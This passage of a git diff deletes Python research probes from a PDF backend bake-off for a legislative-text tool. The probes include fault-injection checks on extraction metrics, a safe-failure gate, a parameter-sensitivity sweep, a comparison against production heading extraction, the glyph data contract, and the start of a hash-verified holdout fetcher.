rather than by a Line.geom - # baseline: geom is None on ordinary print lines, so a geom-keyed lookup finds - # nothing and the sabotage silently does nothing. - drop: set[int] = set() - for row in _rows(page): - m = _NUMBERED.match(R._line_text(row)) - if m and int(m.group(1)) in want: - drop.update(id(g) for g in row) - if drop: - page.glyphs = [g for g in page.glyphs if id(g) not in drop] - return out - - -# ---------- Concern A sabotages ---------------------------------------------- - - -def sa1_perturb_amount(pages: list[PdfPage]) -> list[PdfPage]: - """SA1 (targets A1): change one digit of one dollar amount.""" - out = _clone(pages) - for page in out: - for row in _rows(page): - ordered = sorted(row, key=lambda g: g[X0]) - text = "".join(chr(g[CP]) for g in ordered) - m = re.search(r"\$[\d,]{4,}", text) - if not m: - continue - for i in range(m.start() + 1, m.end()): - g = ordered[i] - if chr(g[CP]).isdigit(): - new_cp = ord("9") if chr(g[CP]) != "9" else ord("1") - tgt = id(g) - page.glyphs = [(new_cp,) + x[1:] if id(x) == tgt else x for x in page.glyphs] - return out - return out - - -def sa2_drop_line(pages: list[PdfPage]) -> list[PdfPage]: - """SA2 (targets A2): delete one printed line's glyphs, mid-document.""" - out = _clone(pages) - if not out: - return out - page = out[len(out) // 2] - rows = _rows(page) - body = [r for r in rows if len(r) > 20] - if not body: - return out - victim = {id(g) for g in body[len(body) // 2]} - page.glyphs = [g for g in page.glyphs if id(g) not in victim] - return out - - -def sa3_drop_one_glyph(pages: list[PdfPage]) -> list[PdfPage]: - """SA3 (targets A4): delete a single glyph. The smallest fault A4 must still catch.""" - out = _clone(pages) - for page in out: - if len(page.glyphs) > 100: - page.glyphs = page.glyphs[:50] + page.glyphs[51:] - return out - return out - - -B_SABOTAGES = { - "S1": (s1_drop_glyphs, "B1"), - "S2": (s2_collapse_size_band, "B2"), - "S2b": (s2b_delete_heading_lines, "B2"), - "S3": (s3_drop_margin_numbers, "B3a"), - "S4": (s4_rotate_heading_slots, "B5"), - "S5": (s5_drop_agency_headings, "B6"), -} - -# The control that decides a metric's void verdict. S2 stays in the run because its -# result is informative -- it measures how much the anchor detector actually leans on the -# small-caps size band -- but S2b is the one that injects "heading not recovered", which -# is the fault B2 names. -DECIDING = {"B1": "S1", "B2": "S2b", "B3a": "S3", "B5": "S4", "B6": "S5"} - -A_SABOTAGES = { - "SA1": (sa1_perturb_amount, "A1"), - "SA2": (sa2_drop_line, "A2"), - "SA3": (sa3_drop_one_glyph, "A4"), -} - -# Separability: (sabotage, its own metric, the metric that must move LESS). -SEPARABILITY = [ - ("S4", "B5", "B2", "threshold", 0.020), - ("S5", "B6", "B2", "strictly-less", None), -] diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py b/docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py deleted file mode 100644 index 0285af75..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py +++ /dev/null @@ -1,155 +0,0 @@ -"""P3: does the pipeline DECLINE what it cannot read, or answer it confidently and wrongly? - -PRE-REGISTRATION-CONFIRMATORY.md, "P3 -- non-corpus robustness probes" and "Safe failure is -a first-class gate". - -Three outcomes per fixture, and only one of them is a failure: - - DECLINES production raises UnsupportedLayoutError -- the safe outcome - ANSWERS a diff with anchors - ANSWERS ANCHORLESS a diff with ZERO anchors -- a confident wrong answer - -Gate S-1: no fixture may land in ANSWERS ANCHORLESS. The exploratory run produced exactly -that state once, reporting 3,468 amount entries against the XML's 0 on an enrolled pair -reached by bypassing the guard, which is why this is a gate and not an observation. - -The population is deliberately mixed, and each class is labelled because they license -different claims: - - P3a real, non-corpus GPO the 12 existing fixtures + a real committee print - P3b synthetic degradations SAFE FAILURE ONLY, never accuracy -- an image-only PDF - (a GPO page rasterized, so no text layer at all) and a - non-GPO producer PDF (CoreGraphics via cupsfilter) - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py -""" - -from __future__ import annotations - -import argparse -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 - -BACKENDS = ("pdfium-wasm", "pdfminer") - - -# Every fixture is REQUIRED, and the count is pinned. This list used to be assembled with -# `if path.exists()`, which meant a tree missing `p3/imageonly.pdf` and `p3/nongpo.pdf` -# scored the remaining thirteen, found no violation and reported gate S-1 as PASSING -- on -# a population that no longer contained the two fixtures that fail it. A gate whose -# negative evidence can silently leave the population is not a gate. -_REQUIRED = ( - ("P3a real non-corpus GPO", "CRPT-118srpt198.pdf"), - ("P3a real non-corpus GPO", "BILLS-118s4795rs.pdf"), - ("P3a real committee print (markup)", "p3/CPRT-119HPRT63305.pdf"), - ("P3b synthetic: image-only", "p3/imageonly.pdf"), - ("P3b synthetic: non-GPO producer", "p3/nongpo.pdf"), -) -_N_SUBCOMMITTEE = 10 # tests/data/subcommittee/*.pdf, as scored in confirm_safe_failure.json - - -def fixtures() -> list[tuple[str, str, Path]]: - d = REPO / "tests/data" - sub = sorted((d / "subcommittee").glob("*.pdf")) - - # Order matches confirm_safe_failure.json: the two named GPO documents, the - # subcommittee prints, then the committee print and the two synthetic degradations. - named = [(k, d / rel) for k, rel in _REQUIRED] - ordered = named[:2] + [("P3a real non-corpus GPO", p) for p in sub] + named[2:] - - missing = [str(p.relative_to(d)) for _, p in named if not p.exists()] - if missing: - raise SystemExit(f"required P3 fixtures missing under tests/data: {', '.join(missing)}") - if len(sub) != _N_SUBCOMMITTEE: - raise SystemExit( - f"tests/data/subcommittee holds {len(sub)} PDFs, expected {_N_SUBCOMMITTEE}; " - "the P3a population has changed and confirm_safe_failure.json is no longer comparable" - ) - return [(k, p.name, p) for k, p in ordered] - - -def classify(pdf: Path, backend: str) -> dict: - try: - raw, summary = run_backend(backend, pdf) - except Exception as exc: # noqa: BLE001 - return {"outcome": "EXTRACTION ERROR", "error": f"{type(exc).__name__}: {exc}"} - try: - pages, _ = reconstruct(raw, repaired=True) - except Exception as exc: # noqa: BLE001 - return {"outcome": "RECONSTRUCT ERROR", "error": f"{type(exc).__name__}: {exc}"} - declined = _is_unnumbered_layout(pages) - anchors = extract_anchors(pages) - n_glyphs = sum(len(p.glyphs) for p in raw) - if declined: - outcome = "DECLINES" - elif anchors: - outcome = "ANSWERS" - else: - outcome = "ANSWERS ANCHORLESS" - return { - "outcome": outcome, - "n_pages": len(pages), - "n_glyphs": n_glyphs, - "n_anchors": len(anchors), - "empty_font_names": (summary or {}).get("empty_font_names"), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_safe_failure.json" - ) - args = ap.parse_args() - - fx = fixtures() - print(f"{len(fx)} fixtures", file=sys.stderr) - rows = [] - for klass, name, pdf in fx: - entry = {"class": klass, "fixture": name, "backends": {}} - for b in BACKENDS: - entry["backends"][b] = classify(pdf, b) - rows.append(entry) - marks = " ".join(f"{b}={entry['backends'][b]['outcome']}" for b in BACKENDS) - print(f" {name:34} {klass[:28]:28} {marks}", file=sys.stderr) - - unsafe = [(r["fixture"], b) for r in rows for b in BACKENDS if r["backends"][b]["outcome"] == "ANSWERS ANCHORLESS"] - result = { - "gate_S1": "no fixture may land in ANSWERS ANCHORLESS", - "violations": unsafe, - "S1_passes": not unsafe, - "conference_report": ( - "NOT OBTAINED -- no package in the govinfo CRPT collection from 2015 onward carries " - "'conference report' in its title across 800 records checked; modern practice uses " - "amendments between the houses instead. Logged as a protocol deviation." - ), - "fixtures": rows, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(result, indent=1)) - - print("\n| fixture | class | " + " | ".join(BACKENDS) + " |") - print("|---|---|" + "---|" * len(BACKENDS)) - for r in rows: - print( - f"| `{r['fixture']}` | {r['class']} | " + " | ".join(r["backends"][b]["outcome"] for b in BACKENDS) + " |" - ) - print(f"\nGate S-1: {'PASS' if not unsafe else 'FAIL -- ' + str(unsafe)}") - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py b/docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py deleted file mode 100644 index 26fdf224..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py +++ /dev/null @@ -1,209 +0,0 @@ -"""Mandatory parameter-sensitivity sweep: does a lead survive the layer's own constants? - -PRE-REGISTRATION-CONFIRMATORY.md, "Mandatory parameter-sensitivity tests". Frozen rules, -none of which are tunable here: - - 5-setting parameter the leader must lead at >= 4 of 5 - 4-setting parameter >= 3 of 4 - binary parameter the ranking must not reverse between the two settings - - a metric that moves by > 0.05 across a parameter's sweep is PARAMETER-FRAGILE on that - metric, and that is reported next to its score - - a lead that exists only at the default is reported as "leads at the default - parameterization only", never as a lead - -This exists because the audit found `_SPACE_FACTOR = 0.25` inherited from PDFium-tuned -production. The confirmatory run then found the constant biting in the OPPOSITE direction -to what the audit anticipated: at a GPO small-caps word boundary the inter-word gap is -~4.3pt against a threshold of exactly 0.25 x 14.0 = 3.50, and the two backends resolve the -small-cap size differently (pdfium 11.2pt, pdfminer 10.5pt), so they land on opposite sides -of the same knife-edge. PDFium loses word spaces inside heading labels -- FAMILYHOUSING, -NAVYAND, ARMYNATIONAL -- which is most of its B2 deficit. - -Whether that is a PDFium defect or an artifact of one constant is exactly what this sweep -decides, and it is the difference between "pdfminer reads headings better" and "pdfminer -reads headings better at 0.25". - -Extraction is the expensive part and is done ONCE per document per backend; every setting -then re-runs only the reconstruction and scoring. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py -""" - -from __future__ import annotations - -import argparse -import json -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import reconstruct as R # noqa: E402 -from contract import run_backend # noqa: E402 -from score_phase1 import ( # noqa: E402 - align_to_body, - corpus_documents, - normalize_for_text_compare, - token_f1, - xml_body_tokens, -) - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 - -CANDIDATES = ("pdfium-wasm", "pdfminer") -FRAGILE = 0.05 - -SWEEPS = { - "_SPACE_FACTOR": {"values": [0.15, 0.20, 0.25, 0.30, 0.40], "default": 0.25}, - "_BASELINE_TOL": {"values": [0.1, 0.3, 0.6, 1.2, 2.0], "default": 0.6}, - "_CHROME_SIZE_RATIO": {"values": [0.0, 0.45, 0.55, 0.65], "default": 0.55}, - "repair_mode": {"values": ["strict", "repaired"], "default": "strict"}, -} -RULE = {5: 4, 4: 3, 2: None} - - -def score_one(raw_pages, xml_tokens, ref, repaired: bool) -> dict: - pages, _ = R.reconstruct(raw_pages, repaired=repaired) - toks = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, _ = align_to_body(xml_tokens, toks) - st = M.pdf_structure(pages) - return { - "B1": token_f1(xml_tokens, aligned)["f1"], - "B2": M.b2_heading_labels(st, ref)["f1"], - "B5": (M.b5_amount_association(st, ref) or {}).get("f1"), - "B6": (M.b6_parent_child(st, ref) or {}).get("accuracy"), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_sensitivity.json" - ) - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument("--docs", default=None, help="comma-separated bill/version keys, for validating the sweep") - args = ap.parse_args() - - docs = corpus_documents() - if args.docs: - want = set(args.docs.split(",")) - docs = [d for d in docs if f"{d[0]}/{d[1]}" in want] - if args.limit_docs: - docs = docs[: args.limit_docs] - - cache: list[dict] = [] - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - try: - raw = {b: run_backend(b, pdf)[0] for b in CANDIDATES} - pages, _ = R.reconstruct(raw["pdfium-wasm"], repaired=True) - if _is_unnumbered_layout(pages): - print(f" [{i}/{len(docs)}] {bill}/{version} declined", file=sys.stderr) - continue - cache.append( - { - "key": f"{bill}/{version}", - "raw": raw, - "xml_tokens": xml_body_tokens(xml), - "ref": M.xml_reference(xml), - "quoted_block": M.xml_has_quoted_block(xml), - } - ) - print(f" [{i}/{len(docs)}] {bill}/{version} cached", file=sys.stderr) - except Exception as exc: # noqa: BLE001 - print(f" [{i}/{len(docs)}] {bill}/{version} ERROR {exc}", file=sys.stderr) - print(f"swept over {len(cache)} production-accepted documents", file=sys.stderr) - - out: dict = {"n_documents": len(cache), "fragile_threshold": FRAGILE, "sweeps": {}} - - for param, spec in SWEEPS.items(): - rows: dict = {} - for value in spec["values"]: - saved = (R._SPACE_FACTOR, R._BASELINE_TOL, R._CHROME_SIZE_RATIO) - repaired = False - if param == "_SPACE_FACTOR": - R._SPACE_FACTOR = value - elif param == "_BASELINE_TOL": - R._BASELINE_TOL = value - elif param == "_CHROME_SIZE_RATIO": - R._CHROME_SIZE_RATIO = value - elif param == "repair_mode": - repaired = value == "repaired" - try: - per_backend: dict = {} - for b in CANDIDATES: - acc: dict[str, list[float]] = {"B1": [], "B2": [], "B5": [], "B6": []} - for entry in cache: - s = score_one(entry["raw"][b], entry["xml_tokens"], entry["ref"], repaired) - for m, v in s.items(): - if v is not None: - acc[m].append(v) - per_backend[b] = {m: round(statistics.mean(v), 5) if v else None for m, v in acc.items()} - rows[str(value)] = per_backend - finally: - R._SPACE_FACTOR, R._BASELINE_TOL, R._CHROME_SIZE_RATIO = saved - print( - f" {param}={value}: " + " ".join(f"{b}.B2={rows[str(value)][b]['B2']}" for b in CANDIDATES), - file=sys.stderr, - ) - - verdicts = {} - for metric in ("B1", "B2", "B5", "B6"): - wins = {b: 0 for b in CANDIDATES} - spread = {b: [] for b in CANDIDATES} - for value in spec["values"]: - r = rows[str(value)] - vals = {b: r[b][metric] for b in CANDIDATES if r[b][metric] is not None} - if len(vals) < 2: - continue - leader = max(vals, key=lambda b: vals[b]) - if abs(vals[CANDIDATES[0]] - vals[CANDIDATES[1]]) > 1e-9: - wins[leader] += 1 - for b, v in vals.items(): - spread[b].append(v) - n = len(spec["values"]) - need = RULE.get(n) - leader = max(wins, key=lambda b: wins[b]) - if n == 2: - held = wins[leader] == sum(wins.values()) or sum(wins.values()) == 0 - rule_text = "ranking does not reverse" if held else "RANKING REVERSES" - else: - held = wins[leader] >= (need or n) - rule_text = f"{wins[leader]}/{n} (needs {need})" - frag = {b: round(max(v) - min(v), 5) if v else None for b, v in spread.items()} - verdicts[metric] = { - "wins": wins, - "leader": leader if wins[leader] else None, - "rule": rule_text, - "lead_holds": bool(held and wins[leader]), - "sweep_spread": frag, - "parameter_fragile": {b: (f is not None and f > FRAGILE) for b, f in frag.items()}, - } - out["sweeps"][param] = {"default": spec["default"], "rows": rows, "verdicts": verdicts} - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - - for param, blk in out["sweeps"].items(): - print(f"\n=== {param} (default {blk['default']}) ===") - for metric, v in blk["verdicts"].items(): - frag = ", ".join( - f"{b} spread {v['sweep_spread'][b]}" for b in CANDIDATES if v["sweep_spread"][b] is not None - ) - fragile = [b for b, f in v["parameter_fragile"].items() if f] - tag = f" PARAMETER-FRAGILE: {', '.join(fragile)}" if fragile else "" - print( - f" {metric:4} leader={v['leader'] or '-':12} {v['rule']:22} lead_holds={v['lead_holds']} {frag}{tag}" - ) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py b/docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py deleted file mode 100644 index b19340a5..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py +++ /dev/null @@ -1,139 +0,0 @@ -"""What Concern A does NOT certify: agreement with PRODUCTION, not with the harness incumbent. - -Concern A's reference is native pypdfium2 through the neutral glyph layer. That answers -"does the WASM build match the native build through the same seam?" -- and it is the right -reference for a backend swap. It does NOT answer "does the proposed glyph architecture -match what production returns today", because production does not use the glyph path at -all: `parsers/pdf_text.py` reads PDFium's TEXT API. - -Those two are not the same, and the difference is not small. On 114-hr-2029/4 production -recovers 60 heading anchors; pdfminer through the glyph layer recovers the same 60 exactly, -while both PDFium builds recover 75 of which 17 are malformed -- FAMILYHOUSING, NAVYAND, -ARMYNATIONAL -- because the layer's word-space rule loses the space at GPO small-caps -boundaries. Production's text API does not lose it. - -So a migration to the glyph architecture carrying PDFium would reproduce the harness -incumbent exactly and REGRESS against production on heading labels, and the exploratory -calibration gate could not have seen it: it compared anchor COUNTS, and the counts are not -what differ. - -This probe quantifies that across the production-accepted corpus. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py -""" - -from __future__ import annotations - -import argparse -import json -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import extract_clean_pages # noqa: E402 - -BACKENDS = ("pdfium-native", "pdfium-wasm", "pdfminer") - - -def labels(pages) -> set[str]: - return {M.norm_label(a.text) for a in extract_anchors(pages) if a.kind in M.PDF_HEADING_KINDS and a.text} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_vs_production.json" - ) - ap.add_argument("--limit-docs", type=int, default=None) - args = ap.parse_args() - - docs = corpus_documents() - if args.limit_docs: - docs = docs[: args.limit_docs] - - rows = [] - for i, (bill, version, pdf, _xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - try: - prod = labels(extract_clean_pages(pdf)) - except Exception as exc: # noqa: BLE001 - print(f" [{i}/{len(docs)}] {key} production ERROR {exc}", file=sys.stderr) - continue - entry = {"doc": key, "production_anchors": len(prod), "backends": {}} - accepted = None - for b in BACKENDS: - try: - raw, _ = run_backend(b, pdf) - pages, _ = reconstruct(raw, repaired=True) - if accepted is None: - accepted = not _is_unnumbered_layout(pages) - got = labels(pages) - entry["backends"][b] = { - "anchors": len(got), - "match_production": len(got & prod), - "absent_from_production": len(got - prod), - "missed_from_production": len(prod - got), - "exact_set_match": got == prod, - "sample_absent": sorted(got - prod)[:3], - } - except Exception as exc: # noqa: BLE001 - entry["backends"][b] = {"error": f"{type(exc).__name__}: {exc}"} - entry["production_accepted"] = accepted - rows.append(entry) - marks = " ".join( - f"{b.split('-')[-1]}={entry['backends'][b].get('absent_from_production', '?')}" for b in BACKENDS - ) - print(f" [{i}/{len(docs)}] {key:<26} prod={len(prod):4} spurious: {marks}", file=sys.stderr) - - acc = [r for r in rows if r["production_accepted"] and r["production_anchors"] > 0] - summary = {} - for b in BACKENDS: - ok = [r for r in acc if "error" not in r["backends"][b]] - exact = sum(1 for r in ok if r["backends"][b]["exact_set_match"]) - spur = [r["backends"][b]["absent_from_production"] for r in ok] - miss = [r["backends"][b]["missed_from_production"] for r in ok] - summary[b] = { - "documents": len(ok), - "exact_set_match": exact, - "total_labels_absent_from_production": sum(spur), - "total_labels_missed_from_production": sum(miss), - "mean_absent_per_doc": round(statistics.mean(spur), 2) if spur else None, - } - out = { - "note": ( - "Production = parsers/pdf_text.extract_clean_pages (the TEXT API path production " - "ships). Each backend = the neutral GLYPH layer this bake-off built. Concern A's " - "reference is the harness incumbent, not this." - ), - "n_documents_scored": len(acc), - "summary": summary, - "documents": rows, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - - print(f"\nOver {len(acc)} production-accepted documents with headings:") - print(f" {'backend':16} {'exact set match':>16} {'labels absent from prod':>24} {'missed':>8}") - for b, s in summary.items(): - print( - f" {b:16} {s['exact_set_match']:>8}/{s['documents']:<7} " - f"{s['total_labels_absent_from_production']:>24} {s['total_labels_missed_from_production']:>8}" - ) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/contract.py b/docs/research/pdf-backend-bakeoff/probes/contract.py deleted file mode 100644 index f0403cb5..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/contract.py +++ /dev/null @@ -1,174 +0,0 @@ -"""The neutral `PdfPage` contract every backend in the bake-off emits. - -This is the seam the spec's "isolate the backend, not the pipeline" section calls for. -Each backend's only job is to produce layout facts; nothing downstream of here knows -which library produced them. In particular, no backend is asked to reproduce PDFium's -text-API conventions (the U+FFFE soft hyphen, trailing spaces, the scrambled reading -order that floats running headers to the top), because `parsers/pdf_text.normalize_raw` -exists specifically to undo those, and asking a challenger to reproduce them would -reintroduce the incumbent as the reference. - -A `Glyph` is deliberately the smallest tuple the engine's geometry consumers need: - - unicode codepoint (int) - x0,y0,x1,y1 bounding box in PDF page space (points, y up) - baseline y of the text-matrix origin -- the TRUE baseline, not the box bottom - font_size effective rendered size in points (font size x text-matrix scale) - font_id PostScript/base font name, "" when the backend cannot resolve one - upright True when the glyph sits on a horizontal baseline - -`upright` earns its place because GPO pages carry a ROTATED left-gutter watermark. For -rotated text the matrix origin is not a horizontal baseline, so those glyphs must be -excluded from horizontal line clustering or they collide with body lines: measured on -this corpus, a stray rotated glyph landed on the baseline of printed lines 24 and 25 and -destroyed the margin-number match for both. PDFium happened to escape that because its -rotated glyphs share one text object; pdfminer and PyMuPDF give each its own origin. -Recovering the fact from box geometry alone is not reliable, and every candidate backend -exposes it directly (mat.b, LTChar.upright, span dir, item transform), so it is a fact -the contract should carry rather than a heuristic the layer should guess. - -Backends emit JSONL so a Node adapter and a Python adapter are interchangeable: one -object per page, then a final {"summary": {...}} line. -""" - -from __future__ import annotations - -import json -import subprocess -import sys -import threading -from collections.abc import Iterator -from dataclasses import dataclass -from pathlib import Path - -# Glyphs are carried as plain tuples on the hot path: a 1000-page bill is ~3M glyphs and -# a dataclass per glyph costs more than the whole extraction. The field order is fixed -# here and is the actual wire format. -GLYPH_FIELDS = ( - "unicode", - "x0", - "y0", - "x1", - "y1", - "baseline", - "font_size", - "font_id", - "upright", -) -CP, X0, Y0, X1, Y1, BASELINE, SIZE, FONT, UPRIGHT = range(9) - -Glyph = tuple[int, float, float, float, float, float, float, str, bool] - - -@dataclass -class PdfPage: - page_number: int # 1-based - width: float - height: float - glyphs: list[Glyph] - - -def page_from_json(obj: dict) -> PdfPage: - return PdfPage( - page_number=obj["page_number"], - width=obj["width"], - height=obj["height"], - glyphs=[tuple(g) for g in obj["glyphs"]], # type: ignore[misc] - ) - - -def page_to_json(page: PdfPage) -> str: - return json.dumps( - { - "page_number": page.page_number, - "width": page.width, - "height": page.height, - "glyphs": page.glyphs, - } - ) - - -def emit(pages: Iterator[PdfPage], summary: dict) -> None: - """Write a page stream plus a trailing summary line to stdout.""" - for page in pages: - sys.stdout.write(page_to_json(page) + "\n") - sys.stdout.write(json.dumps({"summary": summary}) + "\n") - - -def read_stream(lines: Iterator[str]) -> tuple[list[PdfPage], dict]: - pages: list[PdfPage] = [] - summary: dict = {} - for line in lines: - line = line.strip() - if not line: - continue - obj = json.loads(line) - if "summary" in obj: - summary = obj["summary"] - else: - pages.append(page_from_json(obj)) - return pages, summary - - -PROBES = Path(__file__).resolve().parent -# Guarded, not assumed: under Pyodide the probes sit in a flat VFS with no repo above -# them, and a bare parents[3] raises IndexError at import time, taking every browser -# backend down before it runs. -REPO = PROBES.parents[3] if len(PROBES.parents) > 3 else PROBES - -# Every backend is invoked the same way -- as a subprocess emitting the JSONL contract -- -# so a Node backend and a Python backend are indistinguishable to the scorer. Native -# Python backends are also importable directly (see `run_backend`), which avoids the -# subprocess and JSON round-trip when timing them. -NODE_BACKENDS = { - "pdfium-wasm": PROBES / "js" / "dump_pdfium_wasm.mjs", - "pdfjs": PROBES / "js" / "dump_pdfjs.mjs", -} -PYTHON_BACKENDS = { - "pdfium-native": "backends.pdfium_native", - "pdfminer": "backends.pdfminer_backend", - "pymupdf": "backends.pymupdf_backend", - "pypdf": "backends.pypdf_backend", -} -ALL_BACKENDS = list(PYTHON_BACKENDS) + list(NODE_BACKENDS) - - -def run_backend(backend: str, pdf: Path, limit: int | None = None) -> tuple[list[PdfPage], dict]: - """Extract `pdf` through `backend`, returning neutral pages plus its summary. - - Python backends are imported and called in-process; Node backends run as a - subprocess over the JSONL contract. Both return the same types. - """ - if backend in PYTHON_BACKENDS: - sys.path.insert(0, str(PROBES)) - mod = __import__(PYTHON_BACKENDS[backend], fromlist=["extract"]) - return mod.extract(pdf, limit) - - script = NODE_BACKENDS[backend] - cmd = ["node", "--max-old-space-size=8192", str(script), str(Path(pdf).resolve())] - if limit is not None: - cmd += ["--limit", str(limit)] - # Streamed, not captured. A 1000-page enrolled bill is ~3M glyphs; buffering the - # whole JSONL document as one string before parsing costs hundreds of megabytes on - # top of the parsed result. Reading page-by-page keeps one page's JSON alive at a - # time. stderr is drained in a thread so a chatty backend cannot deadlock on a full - # pipe buffer while we are still reading stdout. - proc = subprocess.Popen( - cmd, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - text=True, - cwd=str(script.parent), - bufsize=1024 * 1024, - ) - assert proc.stdout is not None and proc.stderr is not None - errbuf: list[str] = [] - drain = threading.Thread(target=lambda: errbuf.append(proc.stderr.read())) - drain.start() - pages, summary = read_stream(proc.stdout) - proc.stdout.close() - drain.join() - proc.wait() - if proc.returncode != 0: - raise RuntimeError(f"{backend} failed on {pdf}: {''.join(errbuf)[-2000:]}") - return pages, summary diff --git a/docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py deleted file mode 100644 index d14a011d..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py +++ /dev/null @@ -1,50 +0,0 @@ -"""The ENRICHED contract: an ordered character stream with geometry, not a glyph bag. - -`contract.PdfPage` carries glyphs as an unordered set of positioned marks, on the -principle that ordering and spacing are generic PDF-layout decisions the consuming -project should make for itself. This contract tests the opposite principle: that -ordering and word spacing are decisions the PDF ENGINE is better positioned to make, -because it can see the encoding and text-object structure that positions alone do not -carry, and that DeltaTrack's job begins at GPO/legislative interpretation. - -The two differences from `contract.Glyph` are the whole experiment: - - 1. `chars` is ORDERED. Index order is the engine's reading order, and it is - load-bearing rather than incidental. - 2. A char may be GENERATED -- synthesised by the engine rather than read from the - content stream. A generated char has a real codepoint and a real baseline and - NOTHING ELSE: `x0`, `x1`, `size` and the vertical box are None, because measuring - them found only placeholders (zero-area box, identity matrix, size 1.0, empty font - name). They are None rather than filled so that any downstream use of a generated - char's geometry fails loudly instead of quietly consuming a placeholder. - -A backend that cannot supply the ordering or the generated flag cannot emit this -contract, which is the point: it makes the dependency explicit rather than implicit. -""" - -from __future__ import annotations - -from dataclasses import dataclass - -CHAR_FIELDS = ( - "unicode", - "generated", # engine-synthesised (word space, line break), not read from the page - "baseline", # y of FPDFText_GetCharOrigin; PRESENT for generated chars - "x0", # None when generated - "x1", # None when generated - "size", # None when generated - "vbox", # (bottom, top) or None when generated - "font", # "" when generated or unresolved - "upright", -) -CP, GEN, BASELINE, X0, X1, SIZE, VBOX, FONT, UPRIGHT = range(9) - -HybridChar = tuple[int, bool, float | None, float | None, float | None, float | None, tuple | None, str, bool] - - -@dataclass -class HybridPage: - page_number: int # 1-based - width: float - height: float - chars: list[HybridChar] diff --git a/docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py b/docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py deleted file mode 100644 index 4d985b84..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py +++ /dev/null @@ -1,118 +0,0 @@ -"""Restore the P2 holdout corpus from govinfo, verifying every byte against the frozen record. - -WHY THIS EXISTS, AND WHY IT IS NOT `select_holdout.py`. The holdout files themselves are not -committed: 88 documents, 16.4 MB, and the repository's standing convention is that bill -source material is fetched rather than vendored (`/bills`, `/bills_bulk_text`, -`bills_corpus` and `/reference` are all gitignored on that reasoning). What IS committed is -`results/holdout_membership.json`, which records for every one of the 88 files its govinfo -package id, its path, its sha256 and its byte count. That file is itself covered by -`validation/PRESERVED-MANIFEST.txt`, so the record this script trusts is frozen and -hash-checked independently of this script. - -`select_holdout.py` is the SELECTION procedure and must not be used to restore the corpus. -It re-executes the stratified draw, needs the BILLSTATUS ZIPs and `$CLAUDE_JOB_DIR`, and -would REWRITE `holdout_membership.json` -- the one file the pre-registration says is frozen -and never revised. This script reads that file and never writes it. - -WHAT MAKES THE SUBSTITUTION SAFE. Every fetched byte is hashed and compared against the -frozen sha256 before it is written. A govinfo package that has been re-issued, withdrawn or -silently altered therefore FAILS LOUDLY here rather than being scored as if it were the -historical input. That is a property the committed copies did not have: nothing in the tree -verified the vendored bytes against the manifest at all. - -Verified 2026-08-07: all 88 files re-fetch byte-identical to the frozen record. - - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py --verify-only - -Exit status is 0 only when every file in the membership is present and hash-correct. -""" - -from __future__ import annotations - -import argparse -import hashlib -import json 